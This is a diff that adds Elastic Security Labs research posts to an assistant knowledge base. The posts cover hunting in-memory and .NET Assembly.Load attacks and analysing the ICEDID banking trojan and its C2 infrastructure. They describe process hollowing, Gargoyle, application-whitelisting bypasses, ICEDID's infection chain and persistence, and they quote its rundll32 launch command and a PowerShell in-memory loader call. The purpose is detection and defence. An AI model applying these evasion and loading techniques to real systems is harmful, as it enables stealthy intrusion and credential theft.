+![endgame-callstack-malicious-sections.png](/assets/images/hunting-memory/_endgame-callstack-malicious-sections.jpg)
+
+[Winnti](https://hitcon.org/2016/pacific/0composition/pdf/1201/1201%20R2%201610%20winnti%20polymorphism.pdf) is yet another malware sample that uses the Memory Module technique. They had a minor slip on the section permissions of the first page, as you can see below.
+
+![endgame-section-permissions.jpg](/assets/images/hunting-memory/endgame-section-permissions.jpg)
+
+However, the Winnti sample was notable because the MZ/PE headers in the DLL were erased, making it more difficult to detect.
+
+![_endgame-DLL.jpg](/assets/images/hunting-memory/_endgame-DLL.jpg)
+
+### PROCESS HOLLOWING
+
+Process hollowing is another technique attackers use to prevent their malware from being detected by security products and hunters. It involves creating a suspended process, unmapping (hollowing) the original executable from the process, allocating and writing a new payload to the process, redirecting the execution of the original thread to the new payload with SetThreadContext, and finally calling ResumeThread to complete. More stealthy variants use Create/Map section APIs to avoid WriteProcessMemory. Others modify the entry point with a jump instead of using SetThreadContext.
+
+[DarkComet](https://journeyintoir.blogspot.com/2015/02/process-hollowing-meets-cuckoo-sandbox.html) is one of many malware families that use process hollowing techniques. Several artifacts can be used to detect process hollowing. One dead giveaway for this activity is a process being spawned with the CREATE_SUSPENDED flag, as shown in the following screenshot from a DarkComet sample.
+
+![_endgame-darkcomet-sample.jpg](/assets/images/hunting-memory/_endgame-darkcomet-sample.jpg)
+
+### MODULE OVERWRITING
+
+So far, all techniques discussed have led to the execution of non-image backed code, and were therefore fairly straightforward to detect. Module overwriting, on the other hand, avoids this requirement, making it much more difficult to detect. This technique consists of mapping an unused module into a target process and then overwriting the module with its own payload. Flame was the first widely publicized malware family to use this technique. More recently, Careto and Odinaff malware families have used module overwriting techniques. Various techniques can be used to reliably detect module overwriting, which involves comparing memory to associated data on disk.
+
+### GARGOYLE
+
+[Gargoyle](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html) is a proof of concept technique for memory resident malware that can evade detection from many security products. It accomplishes this feat by laying dormant with read-only page protections. It then periodically wakes up, using an asynchronous procedure call, and executes a ROP chain to mark its payload as executable before jumping to it. After the payload finishes executing, Gargoyle again masks its page permissions and goes back to sleep. One way to detect this attacker technique is to examine threads and user APCs for evidence of ROP chains.
+
+## Detecting In-Memory Attacks
+
+Given the proliferation and accessibility of these techniques, security personnel must be vigilant for memory-based attacker techniques and proactively hunt for them on their networks. However, most products cannot generically detect in-memory attacks at scale, leaving defenders with an enormous gap in their ability to protect against these attacks. Endgame has done significant research to bring low-noise detection capabilities into our product for each method mentioned above.
+
+Given the immense size and impact of this detection gap, it is important to raise all boats, not just those of our customers. For this reason, we collaborated with Jared Atkinson on his powershell tool called [Get-InjectedThreads](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2), which implements a relatively low-noise method of detecting in memory threats. It scans active threads on the system for suspicious start addresses. Hunters leverage it to scan hosts in their networks and quickly identify many memory resident malware techniques. The script works by querying each active thread with the NtQueryInformationThread function to retrieve its start address. The start address is then queried with the VirtualQueryEx function to determine the associated section properties. If the memory region where the thread started is unbacked and executable (i.e. not image type and has execute bit set), then the thread is considered injected. The following screenshot shows a sample detection when run on a system infected with a 9002 RAT [sample](https://www.virustotal.com/en/file/49ac6a6c5449396b98a89709b0ad21d078af783ec8f1cd32c1c8b5ae71bec129/analysis/).
+
+![_endgame-RAT-sample.jpg](/assets/images/hunting-memory/_endgame-RAT-sample.jpg)
+
+The script will catch a variety of malware families leveraging the shellcode injection, reflective DLL, memory module, and some process hollowing techniques. However, it is no replacement for security products that comprehensively prevent in-memory attacks, such as Endgame.
+
+## Enterprise In-Memory Detection at Scale
+
+Endgame has built detections for each of these techniques (and many more) into our enterprise security platform, offering best in market capabilities to locate in-memory threats. We do not simply rely on naïve approaches like monitoring well-known system call sequences for process injection, but efficiently analyze memory to find all known evasion capabilities. This provides our users with thread-level visibility on injected code, as well as sophisticated follow-on actions like examining the injected code and suspending only a malicious injected thread to remediate the threat. Our platform is effective both in stopping injection as it is happening in real time as well as locating already resident adversaries hiding in memory, locating threats across tens of thousands of hosts in seconds.
+
+Like any signatureless detection technique, false positives (FPs) are an important consideration. As we researched and implemented our technique-based preventions for each adversary technique described above, we initially encountered FPs at every step of the way. Handling these correctly in our product is of paramount importance.
+
+Most FPs are related to security software, Just-In-Time (JIT) compiled code, or DRM protected/packed applications. Security products sometimes inject code to some or all processes on the system to enhance their behavioral detection capabilities. The downside is if the product is sloppy in its methods, it can actually [harm](https://www.blackhat.com/docs/us-16/materials/us-16-Yavo-Captain-Hook-Pirating-AVs-To-Bypass-Exploit-Mitigations.pdf) the security of the system and make hunting for real in memory threats more difficult. JIT code, another potential area for false positives, generates assembly code at runtime which lives in unbacked or floating memory regions. .NET or Java applications are a couple of examples which use JIT techniques. Fortunately, this type of code is easier to identify and filter than rogue security products. Lastly, applications packed or protected with Digital Rights Management (DRM) schemes should be kept in mind. These applications may decrypt or deobfuscate their core functionality in memory to deter debugging and reverse engineering. However, the same techniques are used by malware to evade detection and deter analysis from security practitioners.
+
+Through careful design decisions and extensive testing, we have managed to achieve very low false positive rates, allowing Endgame users to root out in-memory threats rapidly.
+
+## Conclusion
+
+Adversaries will continue to innovate new techniques to avoid detection and accomplish their objectives. Memory resident techniques are no exception, and have been a thorn in the side of endpoint security defenders for over a decade. Fortunately, by understanding the latest techniques, we can turn the tables and use this knowledge to develop new high fidelity detection methods. At Endgame, our comprehensive approach to these attacks have led us to a market leading position for fileless attack detection (adding to our other key technologies). For more on hunting for in-memory attacks, check out our [slides](https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory) from our SANS Threat Hunting and IR Summit presentation.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_memory_net_attacks.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_memory_net_attacks.md
new file mode 100644
index 0000000000000..061473e79f539
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_memory_net_attacks.md
@@ -0,0 +1,77 @@
+---
+title: "Hunting For In-Memory .NET Attacks"
+slug: "hunting-memory-net-attacks"
+date: "2022-06-21"
+description: "As a follow up to my DerbyCon presentation, this post will investigate an emerging trend of adversaries using .NET-based in-memory techniques to evade detection"
+author:
+  - slug: joe-desimone
+image: "photo-edited-04@2x.jpg"
+category:
+  - slug: security-research
+---
+
+![Hunting-memory-hunting_in_memory_.net_1.png](/assets/images/hunting-memory-net-attacks/Hunting-memory-hunting_in_memory_.net_1.png)
+
+In past blog posts, we shared our [approach](https://www.endgame.com/blog/technical-blog/hunting-memory) to hunting for traditional in-memory attacks along with in-depth [analysis](https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) of many injection techniques. As a follow up to my DerbyCon [presentation](https://www.endgame.com/resource/video/derbycon-talk-hunting-memory-resident-malware), this post will investigate an emerging [trend](https://securelist.com/the-rise-of-net-and-powershell-malware/72417/) of adversaries using .NET-based in-memory techniques to evade detection. I’ll discuss both eventing (real-time) and on-demand based detection strategies of these .NET techniques. At Endgame, we understand that these differing approaches to detection and prevention are complimentary, and together result in the most robust defense against in-memory attacks.
+
+## The .NET Allure
+
+Using .NET in-memory techniques, or even standard .NET applications, are attractive to adversaries for several reasons. First and foremost, the [.NET framework](https://en.wikipedia.org/wiki/.NET_Framework) comes [pre-installed](https://blogs.msdn.microsoft.com/astebner/2007/03/14/mailbag-what-version-of-the-net-framework-is-included-in-what-version-of-the-os/) in all Windows versions. This is important as it enables the attackers’ malware to have maximum compatibility across victims. Next, the .NET PE metadata format itself is fairly [complicated](http://www.ntcore.com/files/dotnetformat.htm). Due to resource constraints, many endpoint security vendors have limited insight into the managed (.NET) structures of these applications beyond what is shared with vanilla, unmanaged (not .NET) applications. In other words, most AVs and security products don’t defend well against malicious .NET code and adversaries know it. Finally, the .NET framework has built-in functionality to dynamically load memory-only modules through the [Assembly.Load(byte[])](<https://msdn.microsoft.com/en-us/library/system.reflection.assembly.load(v=vs.110).aspx>) function (and its various overloads). This function allows attackers to easily craft crypters/loaders, keep their payloads off disk, and even bypass application whitelisting solutions like [Device Guard](https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies). This post focuses on the Assembly.Load function due to the robust set of attacker capabilities it supports.
+
+## .NET Attacker Techniques
+
+Adversaries leveraging .NET in-memory techniques is not completely new. However, in the last six months, there has been a noticeable uptick in tradecraft, which I’ll briefly discuss to illustrate the danger. For instance, in 2014, DEEP PANDA, a threat group suspected of operating out of China, was [observed](https://www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/) using the multi-stage MadHatter implant which is written in .NET. More interestingly, this implant exists only in memory after a multi stage Assembly.Load bootstrapping process that begins with PowerShell. PowerShell can directly call .NET methods, and the Assembly.Load function being no exception. It is as easy as calling [System.Reflection.Assembly]::Load($bin). More recently, the [OilRig](https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/) APT Group used a packed .NET malware sample known as ISMInjector to evade signature based detection. During the unpacking routine, the sample uses the Assembly.Load function to access the embedded next stage malware known as [ISMAgent](https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/).
+
+A third example, more familiar to red teams, is [ReflectivePick](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerPick/ReflectivePick/ReflectivePick.cpp) by [Justin Warner](https://twitter.com/sixdub) and [Lee Christensen](https://twitter.com/tifkin_). ReflectivePick allows PowerShell Empire to inject and bootstrap PowerShell into any running process. It leverages the Assembly.Load() method to load their PowerShell runner DLL without dropping it to disk. The image below shows the relevant source code of their tool.
+
+![Hunting-memory-load-assembly-from-memory-2.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-load-assembly-from-memory-2.jpg)
+
+It is important to point out that Assembly.Load, being a core function of the .NET framework, is often used in legitimate programs. This includes built-in Microsoft applications, which has led to an interesting string of defense evasion and application whitelisting bypasses. For example, [Matt Graeber](https://twitter.com/mattifestation) discovered a Device Guard bypass that targets a race condition to hijack legitimate calls to Assembly.Load, allowing an attacker to execute any unsigned .NET code on a Device Guard protected host. Because of the difficulty in fixing such a technique, Microsoft currently has decided not to service this issue, leaving attackers a convenient “forever-day exploit” against hosts that are hardened with application whitelisting.
+
+[Casey Smith](https://twitter.com/subTee) also has published a ton of research bypassing application whitelisting solutions. A number of these techniques, at their core, target signed Microsoft applications that call the Assembly.Load method with attacker-supplied code. One example is MSBuild, which comes pre-installed on Windows and allows attackers to execute unsigned .NET code inside a legitimate and signed Microsoft process. These techniques are not JUST useful to attackers who are targeting application whitelisting protected environments. Since they allow attacker code to be loaded into legitimate signed processes in an unconventional manner, most anti-virus and EDR products are blind to the attacker activity and can be bypassed.
+
+Finally, [James Forshaw](https://twitter.com/tiraniddo) developed the [DotNetToJScript](https://github.com/tyranid/DotNetToJScript) technique. At its heart, this technique leverages the BinaryFormatter deserialization method to load a .NET application using only JScript. Interestingly enough, the technique under the hood will make a call to the Assembly.Load method. DotNetToJscript opened the door for many new clever techniques for executing unsigned .NET code in a stealthy manner. For example, James [demonstrated](https://bugs.chromium.org/p/project-zero/issues/detail?id=1081) how to combine DotNetToJScript with [com hijacking](https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com) and Casey’s squiblydoo technique to inject code into [protected processes](http://www.alex-ionescu.com/?p=97). In another example, Casey weaponized DotNetToJScript in universal.js to execute arbitrary shellcode or PowerShell commands.
+
+The number of Microsoft-signed applications that be can be abused to execute attacker code in a stealthy manner is dizzying. Fortunately, the community has been quick to document and track them publically in a number of places. One good reference is [Oddvar Moe’s](https://twitter.com/Oddvarmoe) [UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList), and another is Microsoft’s own [reference](https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-code-integrity-policies-steps).
+
+## Detecting .NET Attacks
+
+As these examples illustrate, attackers are leveraging .NET in various ways to defeat and evade endpoint detection. Now, let’s explore two approaches to detecting these attacks: on-demand and real-time-based techniques.
+
+### On-demand detection
+
+On-demand detection leverages snapshots in time-type data collection. You don’t need a persistent agent running and collecting data when the attack takes place, but you do need the malicious code running during the hunt/collection time. The trick is to focus on high-value data that can capture actor-agnostic techniques, and has a high signal-to-noise ratio. One example is the [Get-InjectedThread](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2) script for detecting traditional unmanaged in-memory injection techniques. To demonstrate detecting .NET malware usage of the Assembly.Load function, I leverage PowerShell Empire by [Will Schroeder](https://twitter.com/harmj0y) and others. Empire allows you to inject an agent into any process by remotely bootstrapping PowerShell. As you see below, after injection calc.exe has loaded the PowerShell core library System.Management.Automation.ni.dll.
+
+![Hunting-memory-calc.exe.2888-3.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-calc.exe.2888-3.jpg)
+
+This fact alone can be interesting, but a surprisingly large number of legitimate applications load PowerShell. Combining this with process network activity and looking for outliers across all your data may give you better mileage. Upon deeper inspection, we see something even more interesting. As shown below, memory section 0x2710000 contains a full .NET module (PE header present). The characteristics of the memory region are a bit unusual. The type is [MEM_MAPPED](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366775(v=vs.85).aspx>), although there is no associated file mapping object (Note the “Use” field is empty in ProcessHacker). Lastly, the region has a protection of PAGE_READWRITE, which surprisingly is not executable. These memory characteristics are a [side effect](https://github.com/dotnet/coreclr/blob/3452efb58d2f3be867080f8627417b264fcbd73c/src/vm/peimagelayout.cpp#L259) of loading a memory-only module with the Assembly.Load(byte[]) method.
+
+![Hunting-memory-calc.exe.2888.properties-4.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-calc.exe.2888.properties-4.jpg)
+
+To automate this type of hunt, I wrote a PowerShell function called [Get-ClrReflection](https://gist.github.com/dezhub/2875fa6dc78083cedeab10abc551cb58) which looks for this combination of memory characteristics and will save any hits for further analysis. Below is sample output after running it against a workstation that was infected with Empire.
+
+![Hunting-memory-Users-joe-desktop-5.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-Users-joe-desktop-5.jpg)
+
+Once again, you will see hits for legitimate applications that leverage the Assembly.Load function. One common false positive is for XmlSerializer generated assemblies. Standard hunt practices apply. Bucket your hits by process name or better yet with a fuzzy hash match. For example, ClrGuard (details next) will give you TypeRef hash with a “-f” switch. Below is an example from Empire.
+
+![Hunting-memory-TypeRef-System-String-6.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-TypeRef-System-String-6.jpg)
+
+### Eventing-based detection
+
+Eventing-based detecting is great because you won’t need luck that an adversary is active while you are hunting. It also gives you an opportunity to prevent attacker techniques in real-time. To provide signals into the CLR on which .NET runs, we developed and released [ClrGuard](https://github.com/endgameinc/ClrGuard). ClrGuard will hook into all .NET processes on the system. From there, it performs an in-line hook of the native LoadImage() function. This is what Assembly.Load() calls under the CLR hood. When events are observed, they are sent over a named pipe to a monitoring process for further introspection and mitigation decision. For example, Empire’s psinject function can be immediately detected and blocked in real-time as shown in the image below.
+
+![Hunting-memory-CLR-Guard-7.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-CLR-Guard-7.jpg)
+
+In a similar manner, OilRig’s ISMInjector can be quickly detected and blocked.
+
+![Hunting-memory-Client-connected-endgame-8.jpg](/assets/images/hunting-memory-net-attacks/Hunting-memory-Client-connected-endgame-8.jpg)
+
+Another example below shows ClrGuard in action against Casey Smith’s universal.js tool.
+
+![Hunting-memory-Administrator-endgame-9.gif](/assets/images/hunting-memory-net-attacks/Hunting-memory-Administrator-endgame-9.gif)
+
+While we don’t recommend you run ClrGuard across your enterprise (it is Proof of Concept grade), we hope it spurs community discussion and innovation against these types of .NET attacks. These sorts of defensive techniques power protection across the Endgame product, and an enterprise-grade ClrGuard-like feature will be coming soon.
+
+## Conclusion
+
+It is important to thank those doing great offensive security research who are willing to publish their capabilities and tradecraft for the greater good of the community. The recent advancements in .NET in-memory attacks have shown that it is time for defenders to up their game and go toe-to-toe with the more advanced red teams and adversaries. We hope that ClrGuard and Get-ClrReflection help balance the stakes. These tools can increase a defenders optics into .NET malware activities, and raise visibility into this latest evolution of attacker techniques.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/icedid_configuration_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/icedid_configuration_extractor.md
new file mode 100644
index 0000000000000..afb77cb262ee0
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/icedid_configuration_extractor.md
@@ -0,0 +1,68 @@
+---
+title: "ICEDID Configuration Extractor"
+slug: "icedid-configuration-extractor"
+date: "2022-12-06"
+subtitle: "Configuration extraction tool for ICEDID malware."
+description: "Python script to extract the configuration from ICEDID samples."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - icedid
+  - ref1021
+---
+
+Python script to extract the payload from ICEDID samples.
+
+[Download icedid-configuration-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95ce19ae8cffda29/6351abcf20f42038fb989fae/icedid-config-extractor.tar.gz)
+
+> For information on the ICEDID malware and network infrastructure, check out the following resources:
+>
+> - [ICEDIDs network infrastructure is alive and well](https://www.elastic.co/security-labs/icedids-network-infrastructure-is-alive-and-well)
+> - [ICEDID network infrastructure checking utility](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz)
+
+## Getting started
+
+### Docker
+
+The recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.
+
+```
+docker build . -t icedid_loader_config_extractor
+```
+
+Then we run the container with the -v flag to map a host directory to the docker container directory.
+
+```
+docker run -ti --rm -v $(pwd)/data:/data icedid_loader_config_extractor:latest --help
+```
+
+### Running it locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+poetry lock
+poetry install
+poetry shell
+icedid_loader_config_extractor --help
+```
+
+## Usage
+
+All samples need to be unpacked prior to execution extraction attempts.
+
+We can either specify a single sample with **-f** option or a directory of samples with **-d**.
+
+```
+docker run -ti --rm -v $(pwd)/data:/data icedid_loader_config_extractor:latest -d "C:\tmp\samples"
+```
+
+![ICEDID configuration extractor](/assets/images/icedid-configuration-extractor/196841115-5a3a0d95-8df4-45c2-9baa-264cfa9530e9.jpg)
+
+You can collect the extracted configurations from the directory you set when running the extractor.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/icedids_network_infrastructure_is_alive_and_well.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/icedids_network_infrastructure_is_alive_and_well.md
new file mode 100644
index 0000000000000..1dcf7bb4ca5be
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/icedids_network_infrastructure_is_alive_and_well.md
@@ -0,0 +1,322 @@
+---
+title: "ICEDIDs network infrastructure is alive and well"
+slug: "icedids-network-infrastructure-is-alive-and-well"
+date: "2022-10-31"
+description: "Elastic Security Labs details the use of open source data collection and the Elastic Stack to analyze the ICEDID botnet C2 infrastructure."
+author:
+  - slug: daniel-stepanic
+  - slug: seth-goodwin
+  - slug: derek-ditch
+  - slug: andrew-pease
+image: "blog-banner-network-graph-dots.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - malware
+  - icedid
+  - ref1021
+  - bokbot
+---
+
+## Key takeaways
+
+- ICEDID is a full-featured trojan that uses TLS certificate pinning to validate C2 infrastructure.
+- While the trojan has been tracked for several years, it continues to operate relatively unimpeded.
+- A combination of open source collection tools can be used to track the C2 infrastructure.
+
+> For information on the ICEDID configuration extractor and C2 infrastructure validator, check out our posts detailing this:
+>
+> - [ICEDID configuration extractor](https://www.elastic.co/security-labs/icedid-configuration-extractor)
+> - [ICEDID network infrastructure checking utility](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz)
+
+## Preamble
+
+[ICEDID](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid), also known as Bokbot, is a modular banking trojan first discovered in 2017 and has remained active over the last several years. It has been recently known more for its ability to load secondary payloads such as post-compromise frameworks like Cobalt Strike, and has been [linked](https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html) to ransomware activity.
+
+ICEDID is implemented through a multistage process with different components. Initial access is typically gained through phishing campaigns leveraging malicious documents or file attachments.
+
+We’ll be discussing aspects of ICEDID in the next couple of sections as well as exploring our analysis technique in tracking ICEDID infrastructure.
+
+- Initial access
+- Command and control
+- Persistence
+- Core functionality
+- Network infrastructure
+
+> As mentioned in the Preamble, ICEDID has been around for many years and has a rich feature set. As the malware has been analyzed multiple times over the years, we are going to focus on some of the more interesting features.
+
+## Initial access
+
+ICEDID infections come in many different forms and have been adjusted using different techniques and novel execution chains to avoid detection and evade antimalware products. In this sample, ICEDID was delivered through a phishing email. The email contains a ZIP archive with an embedded ISO file. Inside the ISO file is a Windows shortcut (LNK) that, when double-clicked, executes the first stage ICEDID loader (DLL file).
+
+![Initial infection - Windows shortcut & DLL](/assets/images/icedids-network-infrastructure-is-alive-and-well/image14.jpg)
+
+The Windows shortcut target value is configured to execute **%windir%\system32\rundll32.exe olasius.dll,PluginInit** calling the **PluginInit** export, which starts the initial stage of the ICEDID infection. This stage is responsible for decrypting the embedded configuration, downloading a GZIP payload from a C2 server, writing an encrypted payload to disk ( **license.dat** ), and transferring execution to the next stage.
+
+![Windows shortcut command-line](/assets/images/icedids-network-infrastructure-is-alive-and-well/image12.jpg)
+
+The first ICEDID stage starts off by deciphering an encrypted configuration blob of data stored within the DLL that is used to hold C2 domains and the campaign identifier. The first 32 bytes represent the XOR key; the encrypted data is then deciphered with this key.
+
+![Configuration decryption function](/assets/images/icedids-network-infrastructure-is-alive-and-well/image11.jpg)
+
+## Command and control
+
+ICEDID constructs the initial HTTP request using cookie parameters that contain hexadecimal data from the infected machine used for fingerprinting the victim machine. This request will proceed to download the GZIP payload irrespective of any previous identifying information.
+
+eSentire has [published research](https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid) that describes in detail how the gads, gat, ga, u, and io cookie parameters are created.
+
+![ICEDID HTTP request](/assets/images/icedids-network-infrastructure-is-alive-and-well/image4.jpg)
+
+Below are the cookie parameters and example associated values behind them.
+
+| Parameter | Example Data                                                                                 | Note                                                                  |
+| --------- | -------------------------------------------------------------------------------------------- | --------------------------------------------------------------------- |
+| \_\_gads  | 3000901376:1:16212:134                                                                       | Contains campaign ID, flag, GetTickCount, number of running processes |
+| \_\_gat   | 10.0.19044.64                                                                                | OS version, architecture                                              |
+| \_\_ga    | 1.591594.1635208534.76                                                                       | Hypervisor/processor information from CPUID/SwitchToThread function   |
+| \_\_u     | 4445534B544F502D4A4B4738455432:6A6F656C2E68656E646572736F6E:33413945354637303742414339393534 | Stores computer name, username, and bot ID                            |
+| \_\_io    | 21_3990468985_3832573211_2062024380                                                          | Security Identifier (SID)                                             |
+| \_\_gid   | 006869A80704                                                                                 | Encrypted MAC address                                                 |
+
+The downloaded GZIP payload contains a custom structure with a second loader ( **hollow.dat** ) and the encrypted ICEDID core payload ( **license.dat** ). These two files are written to disk and are used in combination to execute the core payload in memory.
+
+![ICEDID writing the second stage loader and payload](/assets/images/icedids-network-infrastructure-is-alive-and-well/image1.jpg)
+
+The next phase highlights a unique element with ICEDID in how it loads the core payload ( **license.dat** ) by using a custom header structure instead of the traditional PE header. Memory is allocated with the sections of the next payload looped over and placed into their own virtual memory space. This approach has been well [documented](https://www.malwarebytes.com/blog/news/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads) and serves as a technique to obstruct analysis.
+
+![ICEDID loading custom structure (header/sections)](/assets/images/icedids-network-infrastructure-is-alive-and-well/image9.jpg)
+
+Each section has its memory protection modified by the **VirtualProtect** function to enable read-only or read/write access to the committed region of memory using the **PAGE_READWRITE** constant.
+
+![ICEDID using the PAGE_READWRITE constant](/assets/images/icedids-network-infrastructure-is-alive-and-well/image6.jpg)
+
+Once the image entry point is set up, the ICEDID core payload is then loaded by a call to the [rax x86 register](https://www.cs.uaf.edu/2017/fall/cs301/lecture/09_11_registers.html#:~:text=rax%20is%20the%2064%2Dbit,processors%20with%20the%2080386%20CPU.).
+
+![ICEDID loading its core payload](/assets/images/icedids-network-infrastructure-is-alive-and-well/image2.jpg)
+
+## Persistence
+
+ICEDID will attempt to set up persistence first using a scheduled task, if that fails it will instead create a Windows Registry run key. Using the Bot ID and **RDTSC** instruction, a scheduled task or run key name is randomly generated. A scheduled task is created using **taskschd.dll** , configured to run at logon for the user, and is triggered every 1 hour indefinitely.
+
+![ICEDID scheduled task](/assets/images/icedids-network-infrastructure-is-alive-and-well/image17.jpg)
+
+## Core functionality
+
+The core functionality of the ICEDID malware has been well documented and largely unchanged. To learn more about the core payload and functionality, check out the [Malpedia page](https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid) that includes a corpus of completed research on ICEDID.
+
+That said, we counted 23 modules during the time of our analysis including:
+
+- MitM proxy for stealing credentials
+- Backconnect module
+- Command execution (PowerShell, cmd)
+- Shellcode injection
+- Collect
+  - Registry key data
+  - Running processes
+  - Credentials
+  - Browser cookies
+  - System information (network, anti-virus, host enumeration)
+- Search and read files
+- Directory/file listing on user’s Desktop
+
+## ICEDID configuration extractor
+
+Elastic Security Labs has released an open source tool, under the Apache 2.0 license, that will allow for configurations to be extracted from ICEDID samples. The tool can be downloaded [here](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt95ce19ae8cffda29/6351abcf20f42038fb989fae/icedid-config-extractor.tar.gz).
+
+![IcedID configuration decryption tool output](/assets/images/icedids-network-infrastructure-is-alive-and-well/image13.jpg)
+
+## TLS certificate pinning
+
+Previous [research](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/) into the ICEDID malware family has highlighted a repetitive way in how the campaigns create their self-signed TLS certificates. Of particular note, this technique for creating TLS certificates has not been updated in approximately 18 months. While speculative in nature, this could be reflective of the fact that this C2 infrastructure is not widely tracked by threat data providers. This allows ICEDID to focus on updating the more transient elements of their campaigns (file hashes, C2 domains, and IP addresses).
+
+The team at Check Point published in-depth and articulate research on tracking ICEDID infrastructure using ICEDID’s TLS certificate pinning feature. Additionally, Check Point [released a script](https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/#Appendix-A:~:text=147.228.198%0A91%5B.%5D193.19.251-,Appendix%20A,-Testing%20a%20server) that takes an IP address and port, and validates the suspect TLS serial number against a value calculated by the ICEDID malware to confirm whether or not the IP address is currently using an ICEDID TLS certificate.
+
+We are including a wrapper that combines internet scanning data from Censys, and ICEDID C2 infrastructure conviction from the Check Point script. It can be downloaded [here](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb86bffd1aef20c5b/6351aba34e565f1cdce29da5/icedid-checker.tar.gz).
+
+### Dataset
+
+As reported by Check Point, the TLS certificate information uses the same Issuer and Subject distinguished names to validate the C2 server before sending any data.
+
+![ICEDID C2 TLS certificate pinning](/assets/images/icedids-network-infrastructure-is-alive-and-well/image7.jpg)
+
+To build our dataset, we used the [Censys CLI tool](https://censys-python.readthedocs.io/en/stable/quick-start.html) to collect the certificate data. We needed to make a slight adjustment to the query from Check Point research, but the results were similar.
+
+```
+censys search 'services.tls.certificates.leaf_data.subject_dn:"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd" and services.tls.certificates.leaf_data.issuer_dn:"CN=localhost, C=AU, ST=Some-State, O=Internet Widgits Pty Ltd" and services.port=443'
+
+[
+  {
+    "ip": "103.208.85.237",
+    "services": [
+      {
+        "port": 22,
+        "service_name": "SSH",
+        "transport_protocol": "TCP"
+      },
+      {
+        "port": 80,
+        "service_name": "HTTP",
+        "transport_protocol": "TCP"
+      },
+      {
+        "port": 443,
+        "service_name": "HTTP",
+        "certificate": "c5e7d92ba63be7fb2c44caa92458beef7047d7f987aaab3bdc41161b84ea2850",
+        "transport_protocol": "TCP"
+      }
+    ],
+    "location": {
+      "continent": "Oceania",
+      "country": "New Zealand",
+      "country_code": "NZ",
+
+…truncated…
+```
+
+This provided us with 113 IP addresses that were using certificates we could begin to attribute to ICEDID campaigns.
+
+### JARM / JA3S
+
+When looking at the data from Censys, we also identified other fields that are useful in tracking TLS communications: [JARM](https://github.com/salesforce/jarm) and [JA3S](https://github.com/salesforce/ja3), both TLS fingerprinting tools from the Salesforce team.
+
+At a high-level, JARM fingerprints TLS servers by _actively_ collecting specific elements of the TLS Server Hello responses. JA3S _passively_ collects values from the TLS Server Hello message. JARM and JA3S are represented as a 62-character or 32-character fingerprint, respectively.
+
+![JARM and JA3S TLS fingerprints in Kibana](/assets/images/icedids-network-infrastructure-is-alive-and-well/image16.png)
+
+JARM and JA3S add additional data points that improve our confidence in connecting the ICEDID C2 infrastructure. In our research, we identified **2ad2ad16d2ad2ad22c2ad2ad2ad2adc110bab2c0a19e5d4e587c17ce497b15** as the JARM and **e35df3e00ca4ef31d42b34bebaa2f86e** as the JA3S fingerprints.
+
